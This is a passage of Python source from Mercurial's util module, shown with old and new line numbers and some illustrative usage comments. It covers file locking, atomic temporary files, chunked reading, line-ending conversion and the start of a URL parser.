1800 1810 return _("filename ends with '%s', which is not allowed "
1801 1811 "on Windows") % t
1802 1812
1803 1813 if pycompat.iswindows:
1804 1814 checkosfilename = checkwinfilename
1805 1815 timer = time.clock
1806 1816 else:
1807 1817 checkosfilename = platform.checkosfilename
1808 1818 timer = time.time
1809 1819
1810 1820 if safehasattr(time, "perf_counter"):
1811 1821 timer = time.perf_counter
1812 1822
1813 1823 def makelock(info, pathname):
1814 1824 """Create a lock file atomically if possible
1815 1825
1816 1826 This may leave a stale lock file if symlink isn't supported and signal
1817 1827 interrupt is enabled.
1818 1828 """
1819 1829 try:
1820 1830 return os.symlink(info, pathname)
1821 1831 except OSError as why:
1822 1832 if why.errno == errno.EEXIST:
1823 1833 raise
1824 1834 except AttributeError: # no symlink in os
1825 1835 pass
1826 1836
1827 1837 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1828 1838 ld = os.open(pathname, flags)
1829 1839 os.write(ld, info)
1830 1840 os.close(ld)
1831 1841
1832 1842 def readlock(pathname):
1833 1843 try:
1834 1844 return os.readlink(pathname)
1835 1845 except OSError as why:
1836 1846 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1837 1847 raise
1838 1848 except AttributeError: # no symlink in os
1839 1849 pass
1840 1850 fp = posixfile(pathname, 'rb')
1841 1851 r = fp.read()
1842 1852 fp.close()
1843 1853 return r
1844 1854
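# Example (illustrative; the lock path and contents are hypothetical):
#
#   makelock(b'host:1234', b'.hg/store/lock')   # symlink where supported,
#                                               # else an O_EXCL file
#   readlock(b'.hg/store/lock')                 # -> b'host:1234'
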
1845 1855 def fstat(fp):
1846 1856 '''stat file object that may not have fileno method.'''
1847 1857 try:
1848 1858 return os.fstat(fp.fileno())
1849 1859 except AttributeError:
1850 1860 return os.stat(fp.name)
1851 1861
1852 1862 # File system features
1853 1863
1854 1864 def fscasesensitive(path):
1855 1865 """
1856 1866 Return true if the given path is on a case-sensitive filesystem
1857 1867
1858 1868 Requires a path (like /foo/.hg) ending with a foldable final
1859 1869 directory component.
1860 1870 """
1861 1871 s1 = os.lstat(path)
1862 1872 d, b = os.path.split(path)
1863 1873 b2 = b.upper()
1864 1874 if b == b2:
1865 1875 b2 = b.lower()
1866 1876 if b == b2:
1867 1877 return True # no evidence against case sensitivity
1868 1878 p2 = os.path.join(d, b2)
1869 1879 try:
1870 1880 s2 = os.lstat(p2)
1871 1881 if s2 == s1:
1872 1882 return False
1873 1883 return True
1874 1884 except OSError:
1875 1885 return True
1876 1886
1877 1887 try:
1878 1888 import re2
1879 1889 _re2 = None
1880 1890 except ImportError:
1881 1891 _re2 = False
1882 1892
1883 1893 class _re(object):
1884 1894 def _checkre2(self):
1885 1895 global _re2
1886 1896 try:
1887 1897 # check if match works, see issue3964
1888 1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1889 1899 except ImportError:
1890 1900 _re2 = False
1891 1901
1892 1902 def compile(self, pat, flags=0):
1893 1903 '''Compile a regular expression, using re2 if possible
1894 1904
1895 1905 For best performance, use only re2-compatible regexp features. The
1896 1906 only flags from the re module that are re2-compatible are
1897 1907 IGNORECASE and MULTILINE.'''
1898 1908 if _re2 is None:
1899 1909 self._checkre2()
1900 1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1901 1911 if flags & remod.IGNORECASE:
1902 1912 pat = '(?i)' + pat
1903 1913 if flags & remod.MULTILINE:
1904 1914 pat = '(?m)' + pat
1905 1915 try:
1906 1916 return re2.compile(pat)
1907 1917 except re2.error:
1908 1918 pass
1909 1919 return remod.compile(pat, flags)
1910 1920
1911 1921 @propertycache
1912 1922 def escape(self):
1913 1923 '''Return the version of escape corresponding to self.compile.
1914 1924
1915 1925 This is imperfect because whether re2 or re is used for a particular
1916 1926 function depends on the flags, etc, but it's the best we can do.
1917 1927 '''
1918 1928 global _re2
1919 1929 if _re2 is None:
1920 1930 self._checkre2()
1921 1931 if _re2:
1922 1932 return re2.escape
1923 1933 else:
1924 1934 return remod.escape
1925 1935
1926 1936 re = _re()
1927 1937
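# Example (illustrative): util.re transparently prefers re2 when it is
# importable and the flags are re2-compatible, else falls back to remod.
#
#   pat = re.compile(br'[ui]', remod.IGNORECASE)
#   pat.match(b'U')   # matches, case-insensitively, with either engine
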
1928 1938 _fspathcache = {}
1929 1939 def fspath(name, root):
1930 1940 '''Get name in the case stored in the filesystem
1931 1941
1932 1942 The name should be relative to root, and be normcase-ed for efficiency.
1933 1943
1934 1944 Note that this function is unnecessary, and should not be
1935 1945 called, for case-sensitive filesystems (simply because it's expensive).
1936 1946
1937 1947 The root should be normcase-ed, too.
1938 1948 '''
1939 1949 def _makefspathcacheentry(dir):
1940 1950 return dict((normcase(n), n) for n in os.listdir(dir))
1941 1951
1942 1952 seps = pycompat.ossep
1943 1953 if pycompat.osaltsep:
1944 1954 seps = seps + pycompat.osaltsep
1945 1955 # Protect backslashes. This gets silly very quickly.
1946 1956 seps = seps.replace('\\', '\\\\')
1947 1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1948 1958 dir = os.path.normpath(root)
1949 1959 result = []
1950 1960 for part, sep in pattern.findall(name):
1951 1961 if sep:
1952 1962 result.append(sep)
1953 1963 continue
1954 1964
1955 1965 if dir not in _fspathcache:
1956 1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1957 1967 contents = _fspathcache[dir]
1958 1968
1959 1969 found = contents.get(part)
1960 1970 if not found:
1961 1971 # retry "once per directory" per "dirstate.walk", which
1962 1972 # may take place for each patch of "hg qpush", for example
1963 1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1964 1974 found = contents.get(part)
1965 1975
1966 1976 result.append(found or part)
1967 1977 dir = os.path.join(dir, part)
1968 1978
1969 1979 return ''.join(result)
1970 1980
1971 1981 def checknlink(testfile):
1972 1982 '''check whether hardlink count reporting works properly'''
1973 1983
1974 1984 # testfile may be open, so we need a separate file for checking to
1975 1985 # work around issue2543 (or testfile may get lost on Samba shares)
1976 1986 f1, f2, fp = None, None, None
1977 1987 try:
1978 1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1979 1989 suffix='1~', dir=os.path.dirname(testfile))
1980 1990 os.close(fd)
1981 1991 f2 = '%s2~' % f1[:-2]
1982 1992
1983 1993 oslink(f1, f2)
1984 1994 # nlinks() may behave differently for files on Windows shares if
1985 1995 # the file is open.
1986 1996 fp = posixfile(f2)
1987 1997 return nlinks(f2) > 1
1988 1998 except OSError:
1989 1999 return False
1990 2000 finally:
1991 2001 if fp is not None:
1992 2002 fp.close()
1993 2003 for f in (f1, f2):
1994 2004 try:
1995 2005 if f is not None:
1996 2006 os.unlink(f)
1997 2007 except OSError:
1998 2008 pass
1999 2009
2000 2010 def endswithsep(path):
2001 2011 '''Check path ends with os.sep or os.altsep.'''
2002 2012 return (path.endswith(pycompat.ossep)
2003 2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2004 2014
2005 2015 def splitpath(path):
2006 2016 '''Split path by os.sep.
2007 2017 Note that this function does not use os.altsep because it is
2008 2018 an alternative to a simple "xxx.split(os.sep)".
2009 2019 It is recommended to use os.path.normpath() before using this
2010 2020 function if needed.'''
2011 2021 return path.split(pycompat.ossep)
2012 2022
2013 2023 def mktempcopy(name, emptyok=False, createmode=None):
2014 2024 """Create a temporary file with the same contents from name
2015 2025
2016 2026 The permission bits are copied from the original file.
2017 2027
2018 2028 If the temporary file is going to be truncated immediately, you
2019 2029 can use emptyok=True as an optimization.
2020 2030
2021 2031 Returns the name of the temporary file.
2022 2032 """
2023 2033 d, fn = os.path.split(name)
2024 2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2025 2035 os.close(fd)
2026 2036 # Temporary files are created with mode 0600, which is usually not
2027 2037 # what we want. If the original file already exists, just copy
2028 2038 # its mode. Otherwise, manually obey umask.
2029 2039 copymode(name, temp, createmode)
2030 2040 if emptyok:
2031 2041 return temp
2032 2042 try:
2033 2043 try:
2034 2044 ifp = posixfile(name, "rb")
2035 2045 except IOError as inst:
2036 2046 if inst.errno == errno.ENOENT:
2037 2047 return temp
2038 2048 if not getattr(inst, 'filename', None):
2039 2049 inst.filename = name
2040 2050 raise
2041 2051 ofp = posixfile(temp, "wb")
2042 2052 for chunk in filechunkiter(ifp):
2043 2053 ofp.write(chunk)
2044 2054 ifp.close()
2045 2055 ofp.close()
2046 2056 except: # re-raises
2047 2057 try:
2048 2058 os.unlink(temp)
2049 2059 except OSError:
2050 2060 pass
2051 2061 raise
2052 2062 return temp
2053 2063
2054 2064 class filestat(object):
2055 2065 """help to exactly detect change of a file
2056 2066
2057 2067 The 'stat' attribute is the result of 'os.stat()' if the
2058 2068 specified 'path' exists; otherwise it is None. This avoids a
2059 2069 preparatory 'exists()' check on the client side of this class.
2060 2070 """
2061 2071 def __init__(self, stat):
2062 2072 self.stat = stat
2063 2073
2064 2074 @classmethod
2065 2075 def frompath(cls, path):
2066 2076 try:
2067 2077 stat = os.stat(path)
2068 2078 except OSError as err:
2069 2079 if err.errno != errno.ENOENT:
2070 2080 raise
2071 2081 stat = None
2072 2082 return cls(stat)
2073 2083
2074 2084 @classmethod
2075 2085 def fromfp(cls, fp):
2076 2086 stat = os.fstat(fp.fileno())
2077 2087 return cls(stat)
2078 2088
2079 2089 __hash__ = object.__hash__
2080 2090
2081 2091 def __eq__(self, old):
2082 2092 try:
2083 2093 # if ambiguity between stat of new and old file is
2084 2094 # avoided, comparison of size, ctime and mtime is enough
2085 2095 # to exactly detect change of a file regardless of platform
2086 2096 return (self.stat.st_size == old.stat.st_size and
2087 2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2088 2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2089 2099 except AttributeError:
2090 2100 pass
2091 2101 try:
2092 2102 return self.stat is None and old.stat is None
2093 2103 except AttributeError:
2094 2104 return False
2095 2105
2096 2106 def isambig(self, old):
2097 2107 """Examine whether new (= self) stat is ambiguous against old one
2098 2108
2099 2109 "S[N]" below means stat of a file at N-th change:
2100 2110
2101 2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2102 2112 - S[n-1].ctime == S[n].ctime
2103 2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2104 2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2105 2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2106 2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2107 2117
2108 2118 Case (*2) above means that a file was changed twice or more
2109 2119 within the same second (= S[n-1].ctime), and comparison of
2110 2120 timestamps is ambiguous.
2111 2121
2112 2122 The basic idea to avoid such ambiguity is "advance mtime by 1
2113 2123 second if the timestamp is ambiguous".
2114 2124
2115 2125 But advancing mtime only in case (*2) doesn't work as
2116 2126 expected, because the naturally advanced S[n].mtime in case (*1)
2117 2127 might be equal to a manually advanced S[n-1 or earlier].mtime.
2118 2128
2119 2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2120 2130 treated as ambiguous regardless of mtime, to avoid overlooking
2121 2131 changes due to collisions between such mtimes.
2122 2132
2123 2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2124 2134 S[n].mtime", even if the size of the file hasn't changed.
2125 2135 """
2126 2136 try:
2127 2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2128 2138 except AttributeError:
2129 2139 return False
2130 2140
2131 2141 def avoidambig(self, path, old):
2132 2142 """Change file stat of specified path to avoid ambiguity
2133 2143
2134 2144 'old' should be previous filestat of 'path'.
2135 2145
2136 2146 This skips avoiding ambiguity, if a process doesn't have
2137 2147 appropriate privileges for 'path'. This returns False in this
2138 2148 case.
2139 2149
2140 2150 Otherwise, this returns True, as "ambiguity is avoided".
2141 2151 """
2142 2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2143 2153 try:
2144 2154 os.utime(path, (advanced, advanced))
2145 2155 except OSError as inst:
2146 2156 if inst.errno == errno.EPERM:
2147 2157 # utime() on the file created by another user causes EPERM,
2148 2158 # if a process doesn't have appropriate privileges
2149 2159 return False
2150 2160 raise
2151 2161 return True
2152 2162
2153 2163 def __ne__(self, other):
2154 2164 return not self == other
2155 2165
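# Example (illustrative): detect and avoid an ambiguous stat after
# rewriting a file in place.
#
#   old = filestat.frompath(path)
#   # ... rewrite the file at path ...
#   new = filestat.frompath(path)
#   if new.isambig(old):
#       new.avoidambig(path, old)   # advance mtime to disambiguate
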
2156 2166 class atomictempfile(object):
2157 2167 '''writable file object that atomically updates a file
2158 2168
2159 2169 All writes will go to a temporary copy of the original file. Call
2160 2170 close() when you are done writing, and atomictempfile will rename
2161 2171 the temporary copy to the original name, making the changes
2162 2172 visible. If the object is destroyed without being closed, all your
2163 2173 writes are discarded.
2164 2174
2165 2175 The checkambig argument of the constructor is used with filestat,
2166 2176 and is useful only if the target file is guarded by a lock
2167 2177 (e.g. repo.lock or repo.wlock).
2168 2178 '''
2169 2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2170 2180 self.__name = name # permanent name
2171 2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2172 2182 createmode=createmode)
2173 2183 self._fp = posixfile(self._tempname, mode)
2174 2184 self._checkambig = checkambig
2175 2185
2176 2186 # delegated methods
2177 2187 self.read = self._fp.read
2178 2188 self.write = self._fp.write
2179 2189 self.seek = self._fp.seek
2180 2190 self.tell = self._fp.tell
2181 2191 self.fileno = self._fp.fileno
2182 2192
2183 2193 def close(self):
2184 2194 if not self._fp.closed:
2185 2195 self._fp.close()
2186 2196 filename = localpath(self.__name)
2187 2197 oldstat = self._checkambig and filestat.frompath(filename)
2188 2198 if oldstat and oldstat.stat:
2189 2199 rename(self._tempname, filename)
2190 2200 newstat = filestat.frompath(filename)
2191 2201 if newstat.isambig(oldstat):
2192 2202 # stat of changed file is ambiguous to original one
2193 2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2194 2204 os.utime(filename, (advanced, advanced))
2195 2205 else:
2196 2206 rename(self._tempname, filename)
2197 2207
2198 2208 def discard(self):
2199 2209 if not self._fp.closed:
2200 2210 try:
2201 2211 os.unlink(self._tempname)
2202 2212 except OSError:
2203 2213 pass
2204 2214 self._fp.close()
2205 2215
2206 2216 def __del__(self):
2207 2217 if safehasattr(self, '_fp'): # constructor actually did something
2208 2218 self.discard()
2209 2219
2210 2220 def __enter__(self):
2211 2221 return self
2212 2222
2213 2223 def __exit__(self, exctype, excvalue, traceback):
2214 2224 if exctype is not None:
2215 2225 self.discard()
2216 2226 else:
2217 2227 self.close()
2218 2228
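# Example (illustrative): writes become visible only on a clean exit from
# the block; an exception discards the temporary copy instead.
#
#   with atomictempfile(b'targetfile', checkambig=True) as fp:
#       fp.write(b'new content')
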
2219 2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2220 2230 """unlink and remove the directory if it is empty"""
2221 2231 if ignoremissing:
2222 2232 tryunlink(f)
2223 2233 else:
2224 2234 unlink(f)
2225 2235 if rmdir:
2226 2236 # try removing directories that might now be empty
2227 2237 try:
2228 2238 removedirs(os.path.dirname(f))
2229 2239 except OSError:
2230 2240 pass
2231 2241
2232 2242 def tryunlink(f):
2233 2243 """Attempt to remove a file, ignoring ENOENT errors."""
2234 2244 try:
2235 2245 unlink(f)
2236 2246 except OSError as e:
2237 2247 if e.errno != errno.ENOENT:
2238 2248 raise
2239 2249
2240 2250 def makedirs(name, mode=None, notindexed=False):
2241 2251 """recursive directory creation with parent mode inheritance
2242 2252
2243 2253 Newly created directories are marked as "not to be indexed by
2244 2254 the content indexing service", if ``notindexed`` is specified
2245 2255 for "write" mode access.
2246 2256 """
2247 2257 try:
2248 2258 makedir(name, notindexed)
2249 2259 except OSError as err:
2250 2260 if err.errno == errno.EEXIST:
2251 2261 return
2252 2262 if err.errno != errno.ENOENT or not name:
2253 2263 raise
2254 2264 parent = os.path.dirname(os.path.abspath(name))
2255 2265 if parent == name:
2256 2266 raise
2257 2267 makedirs(parent, mode, notindexed)
2258 2268 try:
2259 2269 makedir(name, notindexed)
2260 2270 except OSError as err:
2261 2271 # Catch EEXIST to handle races
2262 2272 if err.errno == errno.EEXIST:
2263 2273 return
2264 2274 raise
2265 2275 if mode is not None:
2266 2276 os.chmod(name, mode)
2267 2277
2268 2278 def readfile(path):
2269 2279 with open(path, 'rb') as fp:
2270 2280 return fp.read()
2271 2281
2272 2282 def writefile(path, text):
2273 2283 with open(path, 'wb') as fp:
2274 2284 fp.write(text)
2275 2285
2276 2286 def appendfile(path, text):
2277 2287 with open(path, 'ab') as fp:
2278 2288 fp.write(text)
2279 2289
2280 2290 class chunkbuffer(object):
2281 2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2282 2292 iterator over chunks of arbitrary size."""
2283 2293
2284 2294 def __init__(self, in_iter):
2285 2295 """in_iter is the iterator that's iterating over the input chunks."""
2286 2296 def splitbig(chunks):
2287 2297 for chunk in chunks:
2288 2298 if len(chunk) > 2**20:
2289 2299 pos = 0
2290 2300 while pos < len(chunk):
2291 2301 end = pos + 2 ** 18
2292 2302 yield chunk[pos:end]
2293 2303 pos = end
2294 2304 else:
2295 2305 yield chunk
2296 2306 self.iter = splitbig(in_iter)
2297 2307 self._queue = collections.deque()
2298 2308 self._chunkoffset = 0
2299 2309
2300 2310 def read(self, l=None):
2301 2311 """Read L bytes of data from the iterator of chunks of data.
2302 2312 Returns less than L bytes if the iterator runs dry.
2303 2313
2304 2314 If size parameter is omitted, read everything"""
2305 2315 if l is None:
2306 2316 return ''.join(self.iter)
2307 2317
2308 2318 left = l
2309 2319 buf = []
2310 2320 queue = self._queue
2311 2321 while left > 0:
2312 2322 # refill the queue
2313 2323 if not queue:
2314 2324 target = 2**18
2315 2325 for chunk in self.iter:
2316 2326 queue.append(chunk)
2317 2327 target -= len(chunk)
2318 2328 if target <= 0:
2319 2329 break
2320 2330 if not queue:
2321 2331 break
2322 2332
2323 2333 # The easy way to do this would be to queue.popleft(), modify the
2324 2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2325 2335 # where we read partial chunk content, this incurs 2 dequeue
2326 2336 # mutations and creates a new str for the remaining chunk in the
2327 2337 # queue. Our code below avoids this overhead.
2328 2338
2329 2339 chunk = queue[0]
2330 2340 chunkl = len(chunk)
2331 2341 offset = self._chunkoffset
2332 2342
2333 2343 # Use full chunk.
2334 2344 if offset == 0 and left >= chunkl:
2335 2345 left -= chunkl
2336 2346 queue.popleft()
2337 2347 buf.append(chunk)
2338 2348 # self._chunkoffset remains at 0.
2339 2349 continue
2340 2350
2341 2351 chunkremaining = chunkl - offset
2342 2352
2343 2353 # Use all of unconsumed part of chunk.
2344 2354 if left >= chunkremaining:
2345 2355 left -= chunkremaining
2346 2356 queue.popleft()
2347 2357 # The offset == 0 case is handled by the block above, so this
2348 2358 # won't merely copy via ``chunk[0:]``.
2349 2359 buf.append(chunk[offset:])
2350 2360 self._chunkoffset = 0
2351 2361
2352 2362 # Partial chunk needed.
2353 2363 else:
2354 2364 buf.append(chunk[offset:offset + left])
2355 2365 self._chunkoffset += left
2356 2366 left -= chunkremaining
2357 2367
2358 2368 return ''.join(buf)
2359 2369
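# Example (illustrative): reads may span and split input chunks freely.
#
#   cb = chunkbuffer(iter([b'foo', b'bar']))
#   cb.read(4)   # -> b'foob'
#   cb.read(2)   # -> b'ar'
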
2360 2370 def filechunkiter(f, size=131072, limit=None):
2361 2371 """Create a generator that produces the data in the file size
2362 2372 (default 131072) bytes at a time, up to optional limit (default is
2363 2373 to read all data). Chunks may be less than size bytes if the
2364 2374 chunk is the last chunk in the file, or the file is a socket or
2365 2375 some other type of file that sometimes reads less data than is
2366 2376 requested."""
2367 2377 assert size >= 0
2368 2378 assert limit is None or limit >= 0
2369 2379 while True:
2370 2380 if limit is None:
2371 2381 nbytes = size
2372 2382 else:
2373 2383 nbytes = min(limit, size)
2374 2384 s = nbytes and f.read(nbytes)
2375 2385 if not s:
2376 2386 break
2377 2387 if limit:
2378 2388 limit -= len(s)
2379 2389 yield s
2380 2390
2381 2391 class cappedreader(object):
2382 2392 """A file object proxy that allows reading up to N bytes.
2383 2393
2384 2394 Given a source file object, instances of this type allow reading up to
2385 2395 N bytes from that source file object. Attempts to read past the allowed
2386 2396 limit are treated as EOF.
2387 2397
2388 2398 It is assumed that no I/O is performed on the original file
2389 2399 object other than through this instance. If there is, state
2390 2400 tracking will get out of sync and unexpected results will ensue.
2391 2401 """
2392 2402 def __init__(self, fh, limit):
2393 2403 """Allow reading up to <limit> bytes from <fh>."""
2394 2404 self._fh = fh
2395 2405 self._left = limit
2396 2406
2397 2407 def read(self, n=-1):
2398 2408 if not self._left:
2399 2409 return b''
2400 2410
2401 2411 if n < 0:
2402 2412 n = self._left
2403 2413
2404 2414 data = self._fh.read(min(n, self._left))
2405 2415 self._left -= len(data)
2406 2416 assert self._left >= 0
2407 2417
2408 2418 return data
2409 2419
2410 2420 def readinto(self, b):
2411 2421 res = self.read(len(b))
2412 2422 if res is None:
2413 2423 return None
2414 2424
2415 2425 b[0:len(res)] = res
2416 2426 return len(res)
2417 2427
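# Example (illustrative): reads are capped at the limit, then act as EOF.
#
#   fh = cappedreader(stringio(b'abcdef'), 3)
#   fh.read()    # -> b'abc'
#   fh.read(1)   # -> b''
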
2418 2428 def unitcountfn(*unittable):
2419 2429 '''return a function that renders a readable count of some quantity'''
2420 2430
2421 2431 def go(count):
2422 2432 for multiplier, divisor, format in unittable:
2423 2433 if abs(count) >= divisor * multiplier:
2424 2434 return format % (count / float(divisor))
2425 2435 return unittable[-1][2] % count
2426 2436
2427 2437 return go
2428 2438
2429 2439 def processlinerange(fromline, toline):
2430 2440 """Check that linerange <fromline>:<toline> makes sense and return a
2431 2441 0-based range.
2432 2442
2433 2443 >>> processlinerange(10, 20)
2434 2444 (9, 20)
2435 2445 >>> processlinerange(2, 1)
2436 2446 Traceback (most recent call last):
2437 2447 ...
2438 2448 ParseError: line range must be positive
2439 2449 >>> processlinerange(0, 5)
2440 2450 Traceback (most recent call last):
2441 2451 ...
2442 2452 ParseError: fromline must be strictly positive
2443 2453 """
2444 2454 if toline - fromline < 0:
2445 2455 raise error.ParseError(_("line range must be positive"))
2446 2456 if fromline < 1:
2447 2457 raise error.ParseError(_("fromline must be strictly positive"))
2448 2458 return fromline - 1, toline
2449 2459
2450 2460 bytecount = unitcountfn(
2451 2461 (100, 1 << 30, _('%.0f GB')),
2452 2462 (10, 1 << 30, _('%.1f GB')),
2453 2463 (1, 1 << 30, _('%.2f GB')),
2454 2464 (100, 1 << 20, _('%.0f MB')),
2455 2465 (10, 1 << 20, _('%.1f MB')),
2456 2466 (1, 1 << 20, _('%.2f MB')),
2457 2467 (100, 1 << 10, _('%.0f KB')),
2458 2468 (10, 1 << 10, _('%.1f KB')),
2459 2469 (1, 1 << 10, _('%.2f KB')),
2460 2470 (1, 1, _('%.0f bytes')),
2461 2471 )
2462 2472
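# Example (illustrative):
#
#   bytecount(10)        # -> '10 bytes'
#   bytecount(12345)     # -> '12.1 KB'
#   bytecount(1 << 30)   # -> '1.00 GB'
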
2463 2473 class transformingwriter(object):
2464 2474 """Writable file wrapper to transform data by function"""
2465 2475
2466 2476 def __init__(self, fp, encode):
2467 2477 self._fp = fp
2468 2478 self._encode = encode
2469 2479
2470 2480 def close(self):
2471 2481 self._fp.close()
2472 2482
2473 2483 def flush(self):
2474 2484 self._fp.flush()
2475 2485
2476 2486 def write(self, data):
2477 2487 return self._fp.write(self._encode(data))
2478 2488
2479 2489 # Matches a single EOL, which can be either a CRLF (where repeated
2480 2490 # CRs are removed) or a LF. We do not care about old Macintosh
2481 2491 # files, so a stray CR is an error.
2482 2492 _eolre = remod.compile(br'\r*\n')
2483 2493
2484 2494 def tolf(s):
2485 2495 return _eolre.sub('\n', s)
2486 2496
2487 2497 def tocrlf(s):
2488 2498 return _eolre.sub('\r\n', s)
2489 2499
2490 2500 def _crlfwriter(fp):
2491 2501 return transformingwriter(fp, tocrlf)
2492 2502
2493 2503 if pycompat.oslinesep == '\r\n':
2494 2504 tonativeeol = tocrlf
2495 2505 fromnativeeol = tolf
2496 2506 nativeeolwriter = _crlfwriter
2497 2507 else:
2498 2508 tonativeeol = pycompat.identity
2499 2509 fromnativeeol = pycompat.identity
2500 2510 nativeeolwriter = pycompat.identity
2501 2511
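# Example (illustrative):
#
#   tolf(b'a\r\nb\n')     # -> b'a\nb\n'
#   tocrlf(b'a\nb\r\n')   # -> b'a\r\nb\r\n'
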
2502 2512 if (pyplatform.python_implementation() == 'CPython' and
2503 2513 sys.version_info < (3, 0)):
2504 2514 # There is an issue in CPython that some IO methods do not handle EINTR
2505 2515 # correctly. The following table shows what CPython version (and functions)
2506 2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2507 2517 #
2508 2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2509 2519 # --------------------------------------------------
2510 2520 # fp.__iter__ | buggy | buggy | okay
2511 2521 # fp.read* | buggy | okay [1] | okay
2512 2522 #
2513 2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2514 2524 #
2515 2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2516 2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2517 2527 #
2518 2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2519 2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2520 2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2521 2531 # fp.__iter__ but not other fp.read* methods.
2522 2532 #
2523 2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2524 2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2525 2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2526 2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2527 2537 # to minimize the performance impact.
2528 2538 if sys.version_info >= (2, 7, 4):
2529 2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2530 2540 def _safeiterfile(fp):
2531 2541 return iter(fp.readline, '')
2532 2542 else:
2533 2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2534 2544 # note: this may block longer than necessary because of bufsize.
2535 2545 def _safeiterfile(fp, bufsize=4096):
2536 2546 fd = fp.fileno()
2537 2547 line = ''
2538 2548 while True:
2539 2549 try:
2540 2550 buf = os.read(fd, bufsize)
2541 2551 except OSError as ex:
2542 2552 # os.read only raises EINTR before any data is read
2543 2553 if ex.errno == errno.EINTR:
2544 2554 continue
2545 2555 else:
2546 2556 raise
2547 2557 line += buf
2548 2558 if '\n' in buf:
2549 2559 splitted = line.splitlines(True)
2550 2560 line = ''
2551 2561 for l in splitted:
2552 2562 if l[-1] == '\n':
2553 2563 yield l
2554 2564 else:
2555 2565 line = l
2556 2566 if not buf:
2557 2567 break
2558 2568 if line:
2559 2569 yield line
2560 2570
2561 2571 def iterfile(fp):
2562 2572 fastpath = True
2563 2573 if type(fp) is file:
2564 2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2565 2575 if fastpath:
2566 2576 return fp
2567 2577 else:
2568 2578 return _safeiterfile(fp)
2569 2579 else:
2570 2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2571 2581 def iterfile(fp):
2572 2582 return fp
2573 2583
2574 2584 def iterlines(iterator):
2575 2585 for chunk in iterator:
2576 2586 for line in chunk.splitlines():
2577 2587 yield line
2578 2588
2579 2589 def expandpath(path):
2580 2590 return os.path.expanduser(os.path.expandvars(path))
2581 2591
2582 2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 2593 """Return the result of interpolating items in the mapping into string s.
2584 2594
2585 2595 prefix is a single character string, or a two character string with
2586 2596 a backslash as the first character if the prefix needs to be escaped in
2587 2597 a regular expression.
2588 2598
2589 2599 fn is an optional function that will be applied to the replacement text
2590 2600 just before replacement.
2591 2601
2592 2602 escape_prefix is an optional flag that allows using doubled prefix for
2593 2603 its escaping.
2594 2604 """
2595 2605 fn = fn or (lambda s: s)
2596 2606 patterns = '|'.join(mapping.keys())
2597 2607 if escape_prefix:
2598 2608 patterns += '|' + prefix
2599 2609 if len(prefix) > 1:
2600 2610 prefix_char = prefix[1:]
2601 2611 else:
2602 2612 prefix_char = prefix
2603 2613 mapping[prefix_char] = prefix_char
2604 2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2605 2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606 2616
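# Example (illustrative):
#
#   interpolate(b'%', {b'foo': b'bar'}, b'%foo baz')   # -> b'bar baz'
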
2607 2617 def getport(port):
2608 2618 """Return the port for a given network service.
2609 2619
2610 2620 If port is an integer, it's returned as is. If it's a string, it's
2611 2621 looked up using socket.getservbyname(). If there's no matching
2612 2622 service, error.Abort is raised.
2613 2623 """
2614 2624 try:
2615 2625 return int(port)
2616 2626 except ValueError:
2617 2627 pass
2618 2628
2619 2629 try:
2620 2630 return socket.getservbyname(pycompat.sysstr(port))
2621 2631 except socket.error:
2622 2632 raise error.Abort(_("no port number associated with service '%s'")
2623 2633 % port)
2624 2634
2625 2635 class url(object):
2626 2636 r"""Reliable URL parser.
2627 2637
2628 2638 This parses URLs and provides attributes for the following
2629 2639 components:
2630 2640
2631 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2632 2642
2633 2643 Missing components are set to None. The only exception is
2634 2644 fragment, which is set to '' if present but empty.
2635 2645
2636 2646 If parsefragment is False, fragment is included in query. If
2637 2647 parsequery is False, query is included in path. If both are
